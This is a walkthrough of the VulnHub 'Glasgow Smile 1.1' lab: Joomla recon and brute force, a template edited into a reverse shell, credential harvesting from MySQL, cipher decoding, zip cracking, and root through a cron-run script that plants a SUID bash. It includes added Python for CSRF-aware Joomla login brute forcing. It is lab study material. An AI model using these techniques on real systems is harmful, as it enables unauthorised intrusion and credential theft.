Recon
NMAP Complete Scan
# Nmap 7.92 scan initiated Tue Jan 25 18:30:16 2022 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /root/vulnHub/Glasglow-Smile-1.1/192.168.1.1/scans/tcp80/tcp_80_http_nmap.txt -oX /root/vulnHub/Glasglow-Smile-1.1/192.168.1.1/scans/tcp80/xml/tcp_80_http_nmap.xml 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up, received arp-response (0.00019s latency).
Scanned at 2022-01-25 18:30:17 +08 for 17s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-errors: Couldn't find any error pages.
| http-headers:
| Date: Tue, 25 Jan 2022 10:30:24 GMT
| Server: Apache/2.4.38 (Debian)
| Last-Modified: Sat, 13 Jun 2020 18:53:52 GMT
| ETag: "7d-5a7fbb701d4b6"
| Accept-Ranges: bytes
| Content-Length: 125
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
|_http-feed: Couldn't find any feeds.
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; jpg: 1
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_ Other: 1; jpg: 1
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-comments-displayer: Couldn't find any comments.
|_http-server-header: Apache/2.4.38 (Debian)
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-mobileversion-checker: No mobile version detected.
|_http-chrono: Request times for /; avg: 161.31ms; min: 149.31ms; max: 207.34ms
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-vhosts:
|_128 names had status 200
|_http-malware-host: Host appears to be clean
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Site doesn't have a title (text/html).
|_http-exif-spider: ERROR: Script execution failed (use -d to debug)
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-php-version: Logo query returned unknown hash 91f9a8dbb5d9f959d393e53c5dada8fa
|_Credits query returned unknown hash 91f9a8dbb5d9f959d393e53c5dada8fa
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-date: Tue, 25 Jan 2022 10:30:23 GMT; -30m01s from local time.
MAC Address: 00:0C:29:4F:F2:DE (VMware)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 25 18:30:34 2022 -- 1 IP address (1 host up) scanned in 18.68 seconds
TCP/80 (HTTP)
FFUF
┌──(root💀kali)-[~/vulnHub/GoldenEye-1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.1.1/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 125, Words: 7, Lines: 9]
index.html [Status: 200, Size: 125, Words: 7, Lines: 9]
joomla [Status: 301, Size: 311, Words: 20, Lines: 10]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 318 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
- View the enumerated directories: index.html, joomla
- Enumerate joomla w/ joomscan
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1]
└─# joomscan --url http://$ip/joomla -ec
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.3rc1
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.1.1/joomla/administrator/components
http://192.168.1.1/joomla/administrator/modules
http://192.168.1.1/joomla/administrator/templates
http://192.168.1.1/joomla/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.1.1/joomla/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.1.1/joomla/robots.txt
Interesting path found from robots.txt
http://192.168.1.1/joomla/joomla/administrator/
http://192.168.1.1/joomla/administrator/
http://192.168.1.1/joomla/bin/
http://192.168.1.1/joomla/cache/
http://192.168.1.1/joomla/cli/
http://192.168.1.1/joomla/components/
http://192.168.1.1/joomla/includes/
http://192.168.1.1/joomla/installation/
http://192.168.1.1/joomla/language/
http://192.168.1.1/joomla/layouts/
http://192.168.1.1/joomla/libraries/
http://192.168.1.1/joomla/logs/
http://192.168.1.1/joomla/modules/
http://192.168.1.1/joomla/plugins/
http://192.168.1.1/joomla/tmp/
- Admin login page: http://192.168.1.1/joomla/administrator/index.php
- Viewed all directories listed in robots.txt, could not find anything
- Try a bruteforce attack as a last resort
- Generate a custom wordlist w/ cewl
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla]
└─# cewl http://192.168.1.1/joomla/index.php -w passwords.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla]
└─# cat >> usernames.txt << EOF
> Joker
> joker
> Arthur
> arthur
> Rob
> rob
> admin
> joomla
> EOF
- Bruteforce Joomla CMS
- Hydra/Burp did not work: the Joomla login form embeds a per-session CSRF token (a hidden input) that has to be fetched before every attempt, so a static POST template never authenticates
- https://www.securityartwork.es/2013/02/14/nmap-script-http-joomla-brute-where-thc-hydra-doesnt-fit/
- NMAP script: http-joomla-brute (https://nmap.org/nsedoc/scripts/http-joomla-brute.html)
  - http-joomla-brute.uri: specify the path to /administrator/index.php (here /joomla/administrator/index.php, since Joomla lives under /joomla)
- CMSeeK: https://github.com/Tuhinshubhra/CMSeeK (its Joomla bruteforce module fetches the token itself)
- Bruteforce w/ nmap script
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla]
└─# nmap -p80 --script http-joomla-brute 192.168.1.1 --script-args 'userdb=/root/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla/usernames.txt,passdb=/root/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla/passwords.txt,brute.firstonly=true,http-joomla-brute.uri=/joomla/administrator/index.php,http-joomla-brute.threads=5'
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 02:10 +08
Nmap scan report for 192.168.1.1
Host is up (0.00027s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-joomla-brute:
|   Accounts:
|     joomla:Gotham - Valid credentials
|_  Statistics: Performed 1342 guesses in 91 seconds, average tps: 14.4
MAC Address: 00:0C:29:4F:F2:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 91.21 seconds
- Bruteforce w/ CMSeek
 ___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

[+] Joomla Bruteforce Module
[+] Enter target site (https://example.tld): http://192.168.1.1/joomla
[i] Checking for Joomla
[*] Joomla Confirmed... Confirming form and getting token...
[~] Enter Usernames with coma as separation without any space (example: cris,harry): joomla
[i] Bruteforcing User: joomla
[*] Testing Password: Gothamlkyesed
[*] Password found!
 |
 |--[username]--> joomla
 |
 |--[password]--> Gotham
 |
[*] Enjoy The Hunt!
[*] Credentials stored at: /usr/share/cmseek/Result/192.168.1.1_joomla/bruteforce_result_joomla_.txt
- joomla:Gotham
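Why a static brute forcer fails here, as an added example that is not part of the writeup, of nmap's http-joomla-brute or of CMSeeK: Joomla 3 renders its CSRF token as a hidden input whose name is the 32-hex token and whose value is "1", bound to the session cookie, so each attempt has to GET the form, read the token and only then POST. The login page fragment, the token value and the target URL below are constructed for illustration; the fetch/post callables are injected so the flow can be driven by urllib or requests against a real target, or by canned responses offline.

```python
"""Joomla administrator login with per-request CSRF token handling.

Added example (not from the writeup or from nmap/CMSeeK): the token is a
hidden input whose *name* is a 32-hex string and whose value is "1"; it is
tied to the session, so a fixed Hydra/Burp POST body can never log in.
"""
import re
import urllib.parse
from html.parser import HTMLParser

TOKEN_RE = re.compile(r"^[0-9a-f]{32}$")


class _HiddenInputs(HTMLParser):
    """Collect name -> value for every <input type="hidden">."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.hidden[a["name"]] = a.get("value") or ""


def extract_token(html):
    """Return the CSRF token name from a Joomla login page, or None."""
    p = _HiddenInputs()
    p.feed(html)
    for name, value in p.hidden.items():
        if TOKEN_RE.match(name) and value == "1":
            return name
    return None


def build_login_body(username, password, token):
    """POST body the administrator login (option=com_login, task=login) expects."""
    fields = {
        "username": username,
        "passwd": password,
        "option": "com_login",
        "task": "login",
        "return": "aW5kZXgucGhw",  # base64("index.php"), as Joomla emits it
        token: "1",                # the freshly fetched CSRF token
    }
    return urllib.parse.urlencode(fields)


def login_succeeded(response_body):
    """A failed login re-renders the form (with a new token); success lands on
    the control panel, which carries no login token."""
    return extract_token(response_body) is None


def try_login(fetch, post, url, username, password):
    """One guess: GET the form, read its token, POST credentials with it.
    fetch(url) -> html and post(url, body) -> html are supplied by the caller."""
    token = extract_token(fetch(url))
    if token is None:
        raise RuntimeError("no Joomla login form/token found at %s" % url)
    return login_succeeded(post(url, build_login_body(username, password, token)))


# Constructed login page fragment; the token value is made up.
SAMPLE_FORM = """
<form action="/joomla/administrator/index.php" method="post" id="form-login">
  <input name="username" type="text">
  <input name="passwd" type="password">
  <input type="hidden" name="option" value="com_login">
  <input type="hidden" name="task" value="login">
  <input type="hidden" name="return" value="aW5kZXgucGhw">
  <input type="hidden" name="0123456789abcdef0123456789abcdef" value="1">
</form>
"""

if __name__ == "__main__":
    tok = extract_token(SAMPLE_FORM)
    print("token:", tok)
    print("body :", build_login_body("joomla", "Gotham", tok))
```

To drive it against a live host, pass `fetch`/`post` wrappers around one `requests.Session()` (the cookie jar is what keeps the token valid between the GET and the POST); a wordlist loop is then one `try_login` call per candidate.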
- Log in and proceed to http://192.168.1.1/joomla/administrator/index.php?option=com_templates
- Upload a reverse shell by editing /error.php of a template (the writeup edits "protostar") from the template manager
- Execute the reverse shell by requesting the edited file directly, e.g. http://192.168.1.1/joomla/templates/beez3/error.php (the template directory in the URL must match the template whose error.php was modified)
- Obtain www-data shell
┌──(root💀kali)-[~/tools]
└─# nc -nvlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.1.
Ncat: Connection from 192.168.1.1:55604.
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 14:48:46 up  1:42,  0 users,  load average: 0.08, 0.09, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
Privilege Escalation
Rob - Via SQL Creds Found
- Find SQL credentials in Joomla's configuration.php
www-data@glasgowsmile:/var/www$ cd joomla2
www-data@glasgowsmile:/var/www/joomla2$ ls
www-data@glasgowsmile:/var/www/joomla2$ cat configuration.php
- joomla:babyjoker
- Access MySQL w/ the credentials from configuration.php
- Obtain more creds from joomla_db
www-data@glasgowsmile:/var/www/joomla2$ mysql -u joomla -p
Enter password: babyjoker
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 15726
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| batjoke            |
| information_schema |
| joomla_db          |
| mysql              |
| performance_schema |
+--------------------+
5 rows in set (0.000 sec)

MariaDB [(none)]> use joomla_db
Database changed
MariaDB [joomla_db]> SELECT username,password from jnqcu_users;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| joomla   | $2y$10$9.svWPvNCg0qoD1mf8NJFe1SHltICeEvVS7alBkG3M3aFoPFge9yu |
+----------+--------------------------------------------------------------+
1 row in set (0.001 sec)
- No new creds
- Obtain credentials from batjoke
MariaDB [joomla_db]> use batjoke
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [batjoke]> show tables;
+-------------------+
| Tables_in_batjoke |
+-------------------+
| equipment         |
| taskforce         |
+-------------------+
2 rows in set (0.000 sec)

MariaDB [batjoke]> select * from equipment;
Empty set (0.000 sec)

MariaDB [batjoke]> select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type    | date       | name    | pswd                                         |
+----+---------+------------+---------+----------------------------------------------+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
|  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.000 sec)
- Passwords are base64 encoded
- Decode the passwords and pair them with the usernames
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot]
└─# cat creds | cut -d '|' -f5 | sed 's/+\|-\|name//g' | awk 'NF' | tee usernames.txt
Bane
Aaron
Carnage
buster
rob
aunt

┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot]
└─# cat creds | cut -d '|' -f6 | sed 's/+\|-\|pswd//g' | awk 'NF' | tee base64encoded.txt
YmFuZWlzaGVyZQ==
YWFyb25pc2hlcmU=
Y2FybmFnZWlzaGVyZQ==
YnVzdGVyaXNoZXJlZmY=
Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/
YXVudGlzIHRoZSBmdWNrIGhlcmU=

┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot]
└─# for x in $(<base64encoded.txt); do echo -n $x | base64 -d; echo ""; done | tee base64decoded.txt
baneishere
aaronishere
carnageishere
busterishereff
???AllIHaveAreNegativeThoughts???
auntis the fuck here

┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot]
└─# paste -d ":" usernames.txt base64decode.txt
Bane :baneishere
Aaron :aaronishere
Carnage :carnageishere
buster :busterishereff
rob :???AllIHaveAreNegativeThoughts???
aunt :auntis the fuck here
- Extract usernames (uid >= 1000) from /etc/passwd
www-data@glasgowsmile:/home$ awk -F: '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
rob
abner
penguin
- Switch to user rob w/ rob:???AllIHaveAreNegativeThoughts???
- User Flag
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$
Abner - Via Ciphertext
- View files in rob's home directory
rob@glasgowsmile:~$ ls -la
total 52
drwxr-xr-x 3 rob  rob  4096 Jun 16  2020 .
drwxr-xr-x 5 root root 4096 Jun 15  2020 ..
-rw-r----- 1 rob  rob   454 Jun 14  2020 Abnerineedyourhelp
-rw------- 1 rob  rob   113 Jan 26 16:18 .bash_history
-rw-r--r-- 1 rob  rob   220 Jun 13  2020 .bash_logout
-rw-r--r-- 1 rob  rob  3526 Jun 13  2020 .bashrc
-rw-r----- 1 rob  rob   313 Jun 14  2020 howtoberoot
drwxr-xr-x 3 rob  rob  4096 Jun 13  2020 .local
-rw------- 1 rob  rob    81 Jun 15  2020 .mysql_history
-rw-r--r-- 1 rob  rob   807 Jun 13  2020 .profile
-rw-r--r-- 1 rob  rob    66 Jun 15  2020 .selected_editor
-rw-r----- 1 rob  rob    38 Jun 13  2020 user.txt
-rw------- 1 rob  rob   429 Jun 16  2020 .Xauthority
rob@glasgowsmile:~$
- Interesting files: .bash_history, Abnerineedyourhelp, howtoberoot, .local
- View the files
- .bash_history: nothing found
- Abnerineedyourhelp:
rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's." Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
- .local: nothing found
- howtoberoot:
rob@glasgowsmile:~$ cat howtoberoot
(ASCII-art "TRY HARDER" banner)
NO HINTS.
- Decipher the ciphertext: every letter is shifted by one position (Gdkkn → Hello, Zqsgtq → Arthur) while digits, punctuation and the "=" padding are untouched, so the trailing base64 string has been shifted the same way and must be unshifted before decoding
Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't." Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
- Decode the base64 encoded text
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot]
└─# echo -n STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA== | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0
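The two steps above done programmatically, as an added example that is not part of the original writeup: instead of eyeballing the shift, brute-force all 25 Caesar shifts of the Abnerineedyourhelp text, keep the one whose plaintext contains the most common English words, then base64-decode the trailing token. The ciphertext is the one from rob's home directory; the small word list used for scoring is constructed here.

```python
"""Recover the shifted message in Abnerineedyourhelp and decode its token.

Added example, not part of the writeup.  Letters are shifted mod 26 while
digits, '/', '+', '=' and punctuation pass through untouched, which is why
the base64 blob at the end survives the shift and can be decoded afterwards.
"""
import base64
import string

# Ciphertext from rob's Abnerineedyourhelp, verbatim.
CIPHERTEXT = (
    "Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd "
    "rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. "
    "Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, \"Sgd vnqrs ozqs ne gzuhmf z "
    "ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's.\" Mnv H mddc "
    "xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd "
    "dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ=="
)

# Constructed scorer: a handful of frequent English words, 3+ letters so that
# random two-letter collisions in wrong shifts do not count.
COMMON_WORDS = {"the", "and", "you", "his", "this", "for", "with", "that",
                "from", "help", "dear", "hello", "find", "need", "will", "your"}


def caesar_shift(text, k):
    """Shift a-z and A-Z by k positions (wrapping), leave everything else."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + k) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + k) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def score_english(text):
    """Number of tokens that are common English words."""
    words = "".join(c if c.isalpha() else " " for c in text.lower()).split()
    return sum(w in COMMON_WORDS for w in words)


def best_shift(ciphertext):
    """The shift (1..25) whose plaintext scores highest; 1 for this file."""
    return max(range(1, 26), key=lambda k: score_english(caesar_shift(ciphertext, k)))


def recover_password(ciphertext):
    """Unshift, take the last whitespace-separated token, base64-decode it."""
    plain = caesar_shift(ciphertext, best_shift(ciphertext))
    token = plain.split()[-1]
    return base64.b64decode(token).decode()


if __name__ == "__main__":
    k = best_shift(CIPHERTEXT)
    print("shift", k)
    print(caesar_shift(CIPHERTEXT, k))
    print(recover_password(CIPHERTEXT))
```

The scorer is deliberately crude; for a longer or less English-looking text, swap `score_english` for a letter-frequency (chi-squared) test and the rest stays the same.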
- Switch to user abner w/ abner:I33hope99my0death000makes44more8cents00than0my0life0
- User Flag 2
abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
Penguin - Via Creds Found + Cracking Zip file
- View files in abner's home directory
abner@glasgowsmile:~$ ls -la
total 44
drwxr-xr-x 4 abner abner 4096 Jun 16  2020 .
drwxr-xr-x 5 root  root  4096 Jun 15  2020 ..
-rw------- 1 abner abner  167 Jan 25 13:06 .bash_history
-rw-r--r-- 1 abner abner  220 Jun 14  2020 .bash_logout
-rw-r--r-- 1 abner abner 3526 Jun 14  2020 .bashrc
-rw-r----- 1 abner abner  565 Jun 16  2020 info.txt
drwxr-xr-x 3 abner abner 4096 Jun 14  2020 .local
-rw-r--r-- 1 abner abner  807 Jun 14  2020 .profile
drwx------ 2 abner abner 4096 Jun 15  2020 .ssh
-rw-r----- 1 abner abner   38 Jun 16  2020 user2.txt
-rw------- 1 abner abner  399 Jun 15  2020 .Xauthority
abner@glasgowsmile:~$
- Interesting files: .bash_history, info.txt
- View the files
- info.txt:
abner@glasgowsmile:~$ cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile. The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly. The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
- .bash_history:
abner@glasgowsmile:~$ cat .bash_history
whoami
systemctl reboot
fuck
su penguin
mysql -u root -p
exit
cd .bash/
ls
unzip .dear_penguins.zip
cat dear_penguins
rm dear_penguins
exit
- .bash_history shows abner unzipped .dear_penguins.zip, read dear_penguins and then deleted it
- Find .dear_penguins.zip
abner@glasgowsmile:/home/penguin$ find / 2>/dev/null | grep penguin
/home/penguin
/home/penguin/.bash_history
/home/penguin/.bashrc
/home/penguin/.Xauthority
/home/penguin/.bash_logout
/home/penguin/.profile
/home/penguin/SomeoneWhoHidesBehindAMask
/home/penguin/SomeoneWhoHidesBehindAMask/user3.txt
/home/penguin/SomeoneWhoHidesBehindAMask/find
/home/penguin/SomeoneWhoHidesBehindAMask/PeopleAreStartingToNotice.txt
/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
/home/penguin/.ssh
/home/penguin/.local
/home/penguin/.local/share
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
- Found at /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
- View permissions of /home/penguin/SomeoneWhoHidesBehindAMask (the directory is readable but not traversable by abner, so file names are listed while their metadata and contents are denied)
abner@glasgowsmile:/home/penguin$ ls -l SomeoneWhoHidesBehindAMask/
ls: cannot access 'SomeoneWhoHidesBehindAMask/user3.txt': Permission denied
ls: cannot access 'SomeoneWhoHidesBehindAMask/find': Permission denied
ls: cannot access 'SomeoneWhoHidesBehindAMask/PeopleAreStartingToNotice.txt': Permission denied
total 0
-????????? ? ? ? ? ? find
-????????? ? ? ? ? ? PeopleAreStartingToNotice.txt
-????????? ? ? ? ? ? user3.txt
- Unzip dear_penguins.zip: the archive is password protected
- Create a wordlist w/ cewl from info.txt (served from a local web server so cewl can spider it)
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip]
└─# cewl localhost/info.txt -w cewl_info.txt
- Compile all passwords we have (note: echo -n appends without a trailing newline, so a second echo -n lands on the same line as the previous entry; plain echo avoids that)
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip]
└─# cp ../sql/base64decode.txt .

┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip]
└─# cat base64decode.txt cewl_info.txt passwords.txt >> compiled_passwords.txt

┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip]
└─# echo -n I33hope99my0death000makes44more8cents00than0my0life0 >> compiled_passwords.txt
- Crack it w/ john (john_zip is the hash extracted from dear_penguins.zip w/ zip2john)
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip]
└─# john john_zip --wordlist=compiled_passwords.txt
Press 'q' or Ctrl-C to abort, almost any other key for status
I33hope99my0death000makes44more8cents00than0my0life0 (dear_penguins.zip/dear_penguins)
1g 0:00:00:00 DONE (2022-01-27 16:45) 100.0g/s 22700p/s 22700c/s 22700C/s baneishere..Joomla
- Same password as abner
- View the extracted file
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip]
└─# unzip dear_penguins.zip
Archive:  dear_penguins.zip
[dear_penguins.zip] dear_penguins password:
  inflating: dear_penguins

┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip]
└─# cat dear_penguins
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip]
└─# echo -n scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz >> compiled_passwords.txt
- penguin:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
- Switch to user penguin
- User Flag 3
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt
JKR{284a3753ec11a592ee34098b8cb43d52}
Root - Via Cronjob
- View files in /home/penguin/SomeoneWhoHidesBehindAMask
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -la
total 332
drwxr--r-- 2 penguin penguin   4096 Jan 27 02:59 .
drwxr-xr-x 5 penguin penguin   4096 Jun 16  2020 ..
-rwsr-x--x 1 penguin penguin 315904 Jun 15  2020 find
-rw-r----- 1 penguin root      1457 Jun 15  2020 PeopleAreStartingToNotice.txt
-rwxr-xr-x 1 penguin root       664 Jan 27 02:59 .trash_old
-rw-r----- 1 penguin penguin     38 Jun 16  2020 user3.txt
- The SUID find binary is useless: it is owned by penguin, so setuid only grants penguin's own privileges
- .trash_old and PeopleAreStartingToNotice.txt: viewed both, no direct privilege escalation path
- .trash_old is owned and writable by penguin yet was modified minutes ago: assume a root cronjob executes it and overwrite it to drop a SUID copy of bash
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ printf '#!/bin/bash\n\ncp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash\n' > /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old; chmod 4777 /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -l /tmp
total 1152
-rwsr-xr-x 1 root root 1168776 Jan 27 03:07 rootbash
